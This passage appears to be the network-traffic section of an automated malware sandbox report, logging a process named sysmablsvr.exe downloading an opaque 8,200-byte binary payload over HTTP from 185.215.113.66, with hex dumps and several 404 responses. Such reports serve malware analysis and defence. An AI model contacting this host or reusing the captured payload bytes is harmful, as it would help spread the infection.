                                            Data Raw: 4e 47 53 21 00 02 00 00 21 a4 02 5f bf d7 06 d0 66 db 95 d0 b6 7e 4d 73 1b 12 a6 71 ad 9c e5 69 c6 d6 5b 25 88 98 4a 89 82 fe e6 74 a6 38 1a eb 3e 22 ce e3 a2 d2 d5 01 68 0a 70 a8 79 07 ca f9 4c 63 fc eb b6 98 72 6f 5b a4 fa 57 f8 5e 70 83 26 95 85 fd 2f c0 2e 95 74 aa 49 42 a7 2e 1a 40 26 ca ef af 2c b0 be 12 07 f5 63 f0 b4 78 4b 47 cd a7 59 fd 1a 5c 3f be ac ac 2a b7 38 39 74 51 f8 8f f1 22 99 30 94 dc b4 95 94 f6 e0 00 08 e6 10 ad 8e 8a e6 3c b4 85 fb 65 a2 c8 14 27 1d 9d 19 75 f6 6c 4b e3 b1 ff 4e 87 a5 56 da 0d e6 3d f0 be 3e 59 7a 8e 88 30 45 59 f1 90 41 a3 37 ea 67 46 78 11 40 c9 09 7a eb 59 32 7d 2d 1c ae 94 12 63 87 73 11 71 84 4f bc 40 49 13 a6 6e f1 3a cd c4 f3 e5 1f 2b 21 50 28 5a 0c 6c 89 1b ff 33 1a 7b ad 1d 43 06 27 ba db 3b 89 b8 22 d4 a0 52 4a f2 1c c3 4b 6d 64 b4 af 05 c5 78 c0 fd e7 1d f9 77 02 1a 85 6c 0a b5 58 1c 31 aa 89 b5 d0 1e 95 be 53 c5 61 fc c8 cc b2 b0 69 93 73 d5 12 6e a9 83 9e 7d 5f 77 e5 ab 7a 5d 52 54 6a c3 6e 39 15 f0 75 80 ae 26 ae 5d 7f ee 72 b2 fa 99 64 f7 32 71 [TRUNCATED]
                                            Data Ascii: NGS!!_f~Msqi[%Jt8>"hpyLcro[W^p&/.tIB.@&,cxKGY\?*89tQ"0<e'ulKNV=>Yz0EYA7gFx@zY2}-csqO@In:+!P(Zl3{C';"RJKmdxwlX1Saisn}_wz]RTjn9u&]rd2qM;+IK_+;Zh~XS]`iW7WA%nWr&+d7~k\:W?F%x!<*ao*W(s3cxvxze/UKEhoXnZ[}m<aDu}e2}YGBUcWJN4llf~x$V=lEZyp6v'-R~=&/B$K^Dh{$u?c\4b{6BToNBj6;8LTD6*=9$h@v/JMEC0H1oCcTmN{Y#[Mh"rDSp:7"m?\[xu`\pd.A$B?arVa-q'K^F.!|^\'_YJ\aP=C_QS/^Qf$hzT>P]@sy\}6]SE]hU\"2X\
                                            Sep 17, 2024 23:11:39.986195087 CEST124INData Raw: 3b e7 4a 6f 07 26 f2 5f 3c 6d aa fe 95 db 97 f8 b0 2f 4b 12 56 5b b9 33 67 ae bb 5e ea 73 dd 88 84 53 85 7c 35 4b 29 f2 10 dc 76 6c 0a f8 7a 1e 15 12 80 4a 66 51 6c 2d 4d e3 7b cd c8 d5 04 a6 07 dd 75 70 2c 3e 0d 9f 90 09 28 ba 4a fe 89 ba 37 36
                                            Data Ascii: ;Jo&_<m/KV[3g^sS|5K)vlzJfQl-M{up,>(J76s}azeROI;Q
                                            Sep 17, 2024 23:11:39.986211061 CEST1236INData Raw: f7 ba 52 84 70 e5 c8 47 fd 39 a1 05 f5 5c e7 d1 c9 36 f2 8a 1c c4 96 85 23 4e f5 5f d4 34 f5 36 b8 ea 9b 58 a5 dd 50 67 67 34 15 b9 c7 93 c0 53 cb a1 8f e1 01 74 62 c9 b5 29 c1 d3 32 fe 7c 34 dd 74 a5 f1 27 07 f9 31 b8 18 fd 1c 3b 3e 18 65 61 00
                                            Data Ascii: RpG9\6#N_46XPgg4Stb)2|4t'1;>eaJ:A}=ywQS<~a*v'`b#iKOkuV[Upv+jhU(/fxGrUu]Wu#.^0[oyJu?.~>8^vA
                                            Sep 17, 2024 23:11:39.986448050 CEST1236INData Raw: 25 a2 e9 39 6c 76 a6 97 81 c0 d6 ae 1c d1 d3 cd 66 22 9b 5d fb e5 4e 71 16 2e e9 62 84 35 b7 ed a4 22 a7 11 10 f7 9a de 5a 66 0d c9 75 1b 23 e9 7a 44 e3 7c 25 54 26 88 2a ad ae 84 04 e8 6f 21 00 01 91 cf 85 a0 0c d7 de fb 77 5a 42 88 81 3e cb 1e
                                            Data Ascii: %9lvf"]Nq.b5"Zfu#zD|%T&*o!wZB>AQ<kFU7ETbUOBE+xf4So`!yC7eo,z_)%cAIwhHPl~%yT{&T.M'J%xX+QT_3}psbLA
                                            Sep 17, 2024 23:11:39.986484051 CEST1236INData Raw: cf 66 20 57 4e 02 f5 c4 2c 0f 1d 46 9c 09 eb 2a 5a 41 9d 12 45 06 ac 6f 3a d2 a2 c9 cd 8b 1e 96 ef a6 0c ae 37 1b 56 eb 3c 7f 11 bf 45 4c 9c 1e d0 7e 6a 8c 83 aa 7c 22 c8 87 68 53 85 10 11 ab 87 3d af c0 10 2f aa 30 79 28 f8 e8 1a b2 74 6a 85 4f
                                            Data Ascii: f WN,F*ZAEo:7V<EL~j|"hS=/0y(tjOJG.{oG!/CfoB=1c}cf@2$G)k'[Y42p~7>:E-``qQJ`n`ED?*Z:/&
                                            Sep 17, 2024 23:11:39.986516953 CEST1236INData Raw: 07 6a 4a 15 92 fd 68 38 12 fe 18 98 76 59 9a 81 cc 79 e2 73 8b d3 71 d7 91 a4 a0 2b 0b f7 3f 72 a9 0b 19 f2 ab b8 3d 52 f4 82 b6 fc 87 ef eb 03 3d 1a c2 fd c1 fe f4 e9 40 9a 85 ee 4e ae 45 d4 6d 82 e0 28 8c f7 91 8a 6d f3 e5 c0 e2 80 ff fc a4 b3
                                            Data Ascii: jJh8vYysq+?r=R=@NEm(m>itdQ@KE<9Pk-T4uZ>e "/.dg1B!w?CRb#fV4f[U?j8,oz!\oDQbJ-xlWh,'123
                                            Sep 17, 2024 23:11:39.986551046 CEST1236INData Raw: 9b 0e a3 11 48 1b 43 5d 3a ca 67 9b 95 74 c6 1a 5e 97 f0 a3 3f e6 6b 38 62 2b 54 3f 5d a9 3c 9a de e2 92 49 b8 11 66 62 7a c6 78 74 91 48 72 42 03 51 ac b0 5b b1 f9 67 cc 45 6f e0 33 80 ff 25 5b 6c 51 63 ee 7c 1c b7 45 08 bf c5 28 c1 b1 ce 91 d7
                                            Data Ascii: HC]:gt^?k8b+T?]<IfbzxtHrBQ[gEo3%[lQc|E(#iUJ_YV]PaS3|O#?jHq{!ir(KW>VX({;_.(;t)9Nn8*):sSY5.N=4TfGZGBAnI
                                            Sep 17, 2024 23:11:39.989710093 CEST924INData Raw: 9c 1c 31 7a ca 26 09 49 50 f8 f9 1e 63 42 07 ae bc a4 d2 2f 12 be 97 96 6d aa 30 8d b3 e4 c9 ec f2 92 88 e6 4b 7b 47 4a d0 8d c2 bb 94 5d f7 9f 19 45 07 ac 8c a6 1c 8c c9 1b f9 65 88 42 0a 6a 04 e6 bd b7 7c 29 19 e4 71 2f 5e c2 79 5d e8 7e 65 bb
                                            Data Ascii: 1z&IPcB/m0K{GJ]EeBj|)q/^y]~eKLZ|sJvsdfN=B52JVP6/4#.$cy.I)&S8:~6iN7>G]rV


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            37192.168.2.449794185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:41.029292107 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:41.832546949 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:41 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 8200
                                            Last-Modified: Tue, 17 Sep 2024 21:10:46 GMT
                                            Connection: keep-alive
                                            ETag: "66e9f056-2008"
                                            Accept-Ranges: bytes
                                            Data Raw: 4e 47 53 21 00 02 00 00 21 a4 02 5f bf d7 06 d0 66 db 95 d0 b6 7e 4d 73 1b 12 a6 71 ad 9c e5 69 c6 d6 5b 25 88 98 4a 89 82 fe e6 74 a6 38 1a eb 3e 22 ce e3 a2 d2 d5 01 68 0a 70 a8 79 07 ca f9 4c 63 fc eb b6 98 72 6f 5b a4 fa 57 f8 5e 70 83 26 95 85 fd 2f c0 2e 95 74 aa 49 42 a7 2e 1a 40 26 ca ef af 2c b0 be 12 07 f5 63 f0 b4 78 4b 47 cd a7 59 fd 1a 5c 3f be ac ac 2a b7 38 39 74 51 f8 8f f1 22 99 30 94 dc b4 95 94 f6 e0 00 08 e6 10 ad 8e 8a e6 3c b4 85 fb 65 a2 c8 14 27 1d 9d 19 75 f6 6c 4b e3 b1 ff 4e 87 a5 56 da 0d e6 3d f0 be 3e 59 7a 8e 88 30 45 59 f1 90 41 a3 37 ea 67 46 78 11 40 c9 09 7a eb 59 32 7d 2d 1c ae 94 12 63 87 73 11 71 84 4f bc 40 49 13 a6 6e f1 3a cd c4 f3 e5 1f 2b 21 50 28 5a 0c 6c 89 1b ff 33 1a 7b ad 1d 43 06 27 ba db 3b 89 b8 22 d4 a0 52 4a f2 1c c3 4b 6d 64 b4 af 05 c5 78 c0 fd e7 1d f9 77 02 1a 85 6c 0a b5 58 1c 31 aa 89 b5 d0 1e 95 be 53 c5 61 fc c8 cc b2 b0 69 93 73 d5 12 6e a9 83 9e 7d 5f 77 e5 ab 7a 5d 52 54 6a c3 6e 39 15 f0 75 80 ae 26 ae 5d 7f ee 72 b2 fa 99 64 f7 32 71 [TRUNCATED]
                                            Data Ascii: NGS!!_f~Msqi[%Jt8>"hpyLcro[W^p&/.tIB.@&,cxKGY\?*89tQ"0<e'ulKNV=>Yz0EYA7gFx@zY2}-csqO@In:+!P(Zl3{C';"RJKmdxwlX1Saisn}_wz]RTjn9u&]rd2qM;+IK_+;Zh~XS]`iW7WA%nWr&+d7~k\:W?F%x!<*ao*W(s3cxvxze/UKEhoXnZ[}m<aDu}e2}YGBUcWJN4llf~x$V=lEZyp6v'-R~=&/B$K^Dh{$u?c\4b{6BToNBj6;8LTD6*=9$h@v/JMEC0H1oCcTmN{Y#[Mh"rDSp:7"m?\[xu`\pd.A$B?arVa-q'K^F.!|^\'_YJ\aP=C_QS/^Qf$hzT>P]@sy\}6]SE]hU\"2X\
                                            Sep 17, 2024 23:11:41.832598925 CEST1236INData Raw: 3b e7 4a 6f 07 26 f2 5f 3c 6d aa fe 95 db 97 f8 b0 2f 4b 12 56 5b b9 33 67 ae bb 5e ea 73 dd 88 84 53 85 7c 35 4b 29 f2 10 dc 76 6c 0a f8 7a 1e 15 12 80 4a 66 51 6c 2d 4d e3 7b cd c8 d5 04 a6 07 dd 75 70 2c 3e 0d 9f 90 09 28 ba 4a fe 89 ba 37 36
                                            Data Ascii: ;Jo&_<m/KV[3g^sS|5K)vlzJfQl-M{up,>(J76s}azeROI;QRpG9\6#N_46XPgg4Stb)2|4t'1;>eaJ:A}=ywQS<~a
                                            Sep 17, 2024 23:11:41.832653046 CEST1236INData Raw: ef ac c3 55 42 e6 3b 98 2e 10 6b 2b 45 a9 66 f5 d5 16 44 73 51 09 ae 9d 91 12 6b b4 10 4f d1 c2 03 0a 5a 70 d8 c5 59 46 f6 67 25 f5 80 81 b0 46 52 fd 2d 6c c9 b0 b1 40 70 3b 19 98 bd e1 02 df a7 8b bb 4d a4 5d 0c 38 fb 33 ac 89 0f 03 a1 e5 3c 8c
                                            Data Ascii: UB;.k+EfDsQkOZpYFg%FR-l@p;M]83<(QW\iH*"1MDKl,s0k%9lvf"]Nq.b5"Zfu#zD|%T&*o!wZB>AQ<kFU7ETbUOBE+x
                                            Sep 17, 2024 23:11:41.834614038 CEST1236INData Raw: 3d bf 19 32 51 c7 cf e1 45 4a 24 0f 7e 4e 03 98 f2 ad a0 d4 0f 32 6f 75 01 84 39 69 ed fd b8 cb 9e 48 a2 9c 50 d5 b2 79 14 11 ee 91 17 ba 1c 24 39 8d 18 18 28 03 ff 86 c8 ef ae ac 1a d9 d6 b5 31 3a 3a 09 d3 0a 33 8e 4e c7 77 bc 4f c5 dd ce f4 50
                                            Data Ascii: =2QEJ$~N2ou9iHPy$9(1::3NwOP[6Y^ZWKC@2l&6K!f WN,F*ZAEo:7V<EL~j|"hS=/0y(tjOJG.{oG!/CfoB=
                                            Sep 17, 2024 23:11:41.834651947 CEST1236INData Raw: 09 45 40 cc f4 00 13 05 a2 a7 3b 9a d3 53 a7 33 11 08 45 d0 f7 05 89 97 86 37 84 70 98 ae 1e 4f a7 4d c8 47 e4 a2 77 5f 9f 6e 38 26 20 80 04 a8 49 ea 31 e0 bb 5f 5e 28 72 0a 45 4c e7 b5 b1 56 a4 ae e1 a9 46 6b 1d 31 99 44 30 74 c3 c8 b8 30 a8 9e
                                            Data Ascii: E@;S3E7pOMGw_n8& I1_^(rELVFk1D0t0ijs?D7X="c'x-&Zd/=jJh8vYysq+?r=R=@NEm(m>itdQ@KE<9Pk-T
                                            Sep 17, 2024 23:11:41.834686041 CEST1236INData Raw: 89 49 c7 3c 2d df b3 58 1c 60 4c 81 18 ed 8f 3b a5 5d 02 56 f5 47 bb ba 9f 81 9b dd ef 17 8b 84 d8 e1 4c cd 58 be 03 74 25 f4 7f d0 21 51 1a ac b7 18 66 fd 44 98 b5 12 27 02 0c a5 2e 50 d2 b0 81 c8 e4 06 93 65 26 8a 0e fe 54 ea eb 45 df fd 3a e8
                                            Data Ascii: I<-X`L;]VGLXt%!QfD'.Pe&TE:d@.g;N+?)DGuHC]:gt^?k8b+T?]<IfbzxtHrBQ[gEo3%[lQc|E(#iUJ_YV]PaS3|O#?jHq{
                                            Sep 17, 2024 23:11:41.834723949 CEST1048INData Raw: 3e be b1 99 6a a9 f2 eb 53 a4 95 58 30 9b 67 20 a6 03 a5 c9 cd cc 88 df cc 88 07 5d 4e 31 24 43 f6 71 f1 69 34 e9 71 08 eb e5 22 54 a2 8b 81 12 76 c9 e1 2d d5 4b 0c 5a 36 d0 17 db 78 2d 1a d4 76 be d0 2c 49 df 87 18 62 9c f6 17 d4 3f 5d ac ca 70
                                            Data Ascii: >jSX0g ]N1$Cqi4q"Tv-KZ6x-v,Ib?]piXB {-E)P}D~MI.#l1z&IPcB/m0K{GJ]EeBj|)q/^y]~eKLZ|sJvsdfN


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            38192.168.2.449796185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:43.982995987 CEST274OUTGET /1 HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: 185.215.113.66
                                            Connection: Keep-Alive
                                            Sep 17, 2024 23:11:44.682634115 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:44 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 8200
                                            Last-Modified: Tue, 17 Sep 2024 21:10:46 GMT
                                            Connection: keep-alive
                                            ETag: "66e9f056-2008"
                                            Accept-Ranges: bytes
                                            Data Raw: 4e 47 53 21 00 02 00 00 21 a4 02 5f bf d7 06 d0 66 db 95 d0 b6 7e 4d 73 1b 12 a6 71 ad 9c e5 69 c6 d6 5b 25 88 98 4a 89 82 fe e6 74 a6 38 1a eb 3e 22 ce e3 a2 d2 d5 01 68 0a 70 a8 79 07 ca f9 4c 63 fc eb b6 98 72 6f 5b a4 fa 57 f8 5e 70 83 26 95 85 fd 2f c0 2e 95 74 aa 49 42 a7 2e 1a 40 26 ca ef af 2c b0 be 12 07 f5 63 f0 b4 78 4b 47 cd a7 59 fd 1a 5c 3f be ac ac 2a b7 38 39 74 51 f8 8f f1 22 99 30 94 dc b4 95 94 f6 e0 00 08 e6 10 ad 8e 8a e6 3c b4 85 fb 65 a2 c8 14 27 1d 9d 19 75 f6 6c 4b e3 b1 ff 4e 87 a5 56 da 0d e6 3d f0 be 3e 59 7a 8e 88 30 45 59 f1 90 41 a3 37 ea 67 46 78 11 40 c9 09 7a eb 59 32 7d 2d 1c ae 94 12 63 87 73 11 71 84 4f bc 40 49 13 a6 6e f1 3a cd c4 f3 e5 1f 2b 21 50 28 5a 0c 6c 89 1b ff 33 1a 7b ad 1d 43 06 27 ba db 3b 89 b8 22 d4 a0 52 4a f2 1c c3 4b 6d 64 b4 af 05 c5 78 c0 fd e7 1d f9 77 02 1a 85 6c 0a b5 58 1c 31 aa 89 b5 d0 1e 95 be 53 c5 61 fc c8 cc b2 b0 69 93 73 d5 12 6e a9 83 9e 7d 5f 77 e5 ab 7a 5d 52 54 6a c3 6e 39 15 f0 75 80 ae 26 ae 5d 7f ee 72 b2 fa 99 64 f7 32 71 [TRUNCATED]
                                            Data Ascii: NGS!!_f~Msqi[%Jt8>"hpyLcro[W^p&/.tIB.@&,cxKGY\?*89tQ"0<e'ulKNV=>Yz0EYA7gFx@zY2}-csqO@In:+!P(Zl3{C';"RJKmdxwlX1Saisn}_wz]RTjn9u&]rd2qM;+IK_+;Zh~XS]`iW7WA%nWr&+d7~k\:W?F%x!<*ao*W(s3cxvxze/UKEhoXnZ[}m<aDu}e2}YGBUcWJN4llf~x$V=lEZyp6v'-R~=&/B$K^Dh{$u?c\4b{6BToNBj6;8LTD6*=9$h@v/JMEC0H1oCcTmN{Y#[Mh"rDSp:7"m?\[xu`\pd.A$B?arVa-q'K^F.!|^\'_YJ\aP=C_QS/^Qf$hzT>P]@sy\}6]SE]hU\"2X\
                                            Sep 17, 2024 23:11:44.682692051 CEST224INData Raw: 3b e7 4a 6f 07 26 f2 5f 3c 6d aa fe 95 db 97 f8 b0 2f 4b 12 56 5b b9 33 67 ae bb 5e ea 73 dd 88 84 53 85 7c 35 4b 29 f2 10 dc 76 6c 0a f8 7a 1e 15 12 80 4a 66 51 6c 2d 4d e3 7b cd c8 d5 04 a6 07 dd 75 70 2c 3e 0d 9f 90 09 28 ba 4a fe 89 ba 37 36
                                            Data Ascii: ;Jo&_<m/KV[3g^sS|5K)vlzJfQl-M{up,>(J76s}azeROI;QRpG9\6#N_46XPgg4Stb)2|4t'1;>eaJ:A}=
                                            Sep 17, 2024 23:11:44.682729006 CEST1236INData Raw: 07 b2 d0 79 b4 77 0b 51 11 af 53 8c f3 3c ff d1 7e 61 83 2a a8 76 83 ee 9f e2 dc 27 60 e7 9b 08 17 f6 8a 62 10 23 69 1d 4b 4f 85 84 e3 b7 91 88 0e 09 f5 6b 75 a1 56 c8 0d fa 5b fd 12 55 70 9d d1 c6 88 05 76 2b 6a 68 cd fb 93 55 28 2f a5 66 78 b9
                                            Data Ascii: ywQS<~a*v'`b#iKOkuV[Upv+jhU(/fxGrUu]Wu#.^0[oyJu?.~>8^vAo-:6+XqzYg[/B.\\%gd."l,0U10,H*$oI$?cfKE
                                            Sep 17, 2024 23:11:44.682799101 CEST1236INData Raw: a8 37 c4 45 54 19 12 62 e5 55 4f 42 45 2b 78 e7 90 d8 e4 66 f0 9f a6 34 93 f7 d9 53 c7 e8 6f ef 0a b9 60 b1 d6 1e 02 21 79 43 0d b7 ed 37 ee 65 6f 2c 0b 7a 5f dd a6 98 29 25 e4 99 07 63 9b 17 41 11 49 eb eb 77 68 08 48 b9 f3 be a3 d8 1c 0d 8c 50
                                            Data Ascii: 7ETbUOBE+xf4So`!yC7eo,z_)%cAIwhHPl~%yT{&T.M'J%xX+QT_3}psbLABojv6V|Xk{p<$1,8K~#:LtH#H{:Aj/Xt\i6ep
                                            Sep 17, 2024 23:11:44.682832956 CEST1236INData Raw: f3 f3 2f 0b d0 fb 92 8e 43 9b 66 6f 42 3d cf fd 90 df f8 ed bc 98 31 d5 d0 f1 15 b4 11 c8 d8 63 95 cf be 7d b3 93 d5 63 17 66 8c 0d c3 b7 40 c8 d2 ae 32 e1 d5 24 47 29 ff 6b a7 97 27 5b 59 98 9a 0d a1 ac cc 01 34 32 70 7e a3 04 e8 e9 de b1 37 f1
                                            Data Ascii: /CfoB=1c}cf@2$G)k'[Y42p~7>:E-``qQJ`n`ED?*Z:/&,c{}J;GCzcw3g_|Dhi8-5O&(b)-0[Fyl"<!u/_
                                            Sep 17, 2024 23:11:44.682866096 CEST1236INData Raw: 06 0f 08 16 ab 4b 04 f9 45 3c 39 dc 50 ba 6b d0 99 2d 54 1b e1 fd ad a2 34 0a 75 09 19 5a af 3e 89 fd 65 ce 8c 20 b1 d5 17 a4 22 da 8a 88 2f d7 2e 64 67 86 b8 31 13 42 21 1d 77 d3 e0 3f 43 52 96 62 e1 ab e0 23 8d fa be 05 66 8f 56 9a 34 c8 db 66
                                            Data Ascii: KE<9Pk-T4uZ>e "/.dg1B!w?CRb#fV4f[U?j8,oz!\oDQbJ-xlWh,'123n]YmrP5Hh\#p1<PMVE2nR]A[|#)(JSbFrl%
                                            Sep 17, 2024 23:11:44.682899952 CEST896INData Raw: b4 19 aa be 7c 4f 23 f0 3f f2 6a 06 48 ed c3 71 cf d4 7b 05 21 7f 69 72 01 e0 8c e2 28 ea cf 4b 0a 57 3e 56 f7 58 28 fa 7b b8 94 e5 0f e7 88 c6 f1 3b 5f e0 df 2e 28 3b 88 74 c4 bb bb a0 c3 0e cb 29 c4 b4 39 ca c9 4e 1d 6e 12 38 2a e0 29 3a bb e0
                                            Data Ascii: |O#?jHq{!ir(KW>VX({;_.(;t)9Nn8*):sSY5.N=4TfGZGBAnI1$,E.wN]-@$U]J%d2L+T`YLl>I<yC;dLnHBj
                                            Sep 17, 2024 23:11:44.682940960 CEST892INData Raw: ca 87 43 bd 37 4d e9 0c fa 76 51 05 07 ac a2 63 36 22 93 64 4a 45 cb 02 89 1f 6b 38 9d 94 1b c2 05 7b 82 12 15 01 5d f1 47 60 11 62 f5 11 ab 0e ce de e4 41 74 e2 06 55 63 b1 ce ea 58 4c e8 9d 3e 9b 12 f0 96 84 68 eb 59 42 39 4e 38 45 8f f2 67 3c
                                            Data Ascii: C7MvQc6"dJEk8{]G`bAtUcXL>hYB9N8Eg<%35Tpt}%B<aL>jSX0g ]N1$Cqi4q"Tv-KZ6x-v,Ib?]piXB {-E)P}D~MI.#l1
                                            Sep 17, 2024 23:11:44.771183968 CEST272INData Raw: 77 20 d2 e9 82 47 d2 8b 5b 97 b7 13 32 50 05 5d 45 c8 e0 9b c9 8b a1 81 00 cd 52 85 bf 48 a6 1b 71 93 08 d9 03 75 f4 46 fb 9e 9b 65 be 8b cb 7a c2 af f4 63 97 2e d3 c2 7e ae db 52 b1 a7 89 1f e7 85 81 7e 86 de 2c e8 fd a8 94 57 a3 05 25 33 f6 c6
                                            Data Ascii: w G[2P]ERHquFezc.~R~,W%36NgQ2~a8GI9708qARgsjUcoB\3h9aF3m:*1\g1<)TXBK!DOPWuep{g@m^xu


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            39192.168.2.449797185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:46.807744980 CEST166OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:47.503910065 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:47 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            40192.168.2.449799185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:49.558219910 CEST166OUTGET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:50.288872004 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:50 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            41192.168.2.449800185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:52.370625019 CEST166OUTGET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:53.080163956 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:52 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
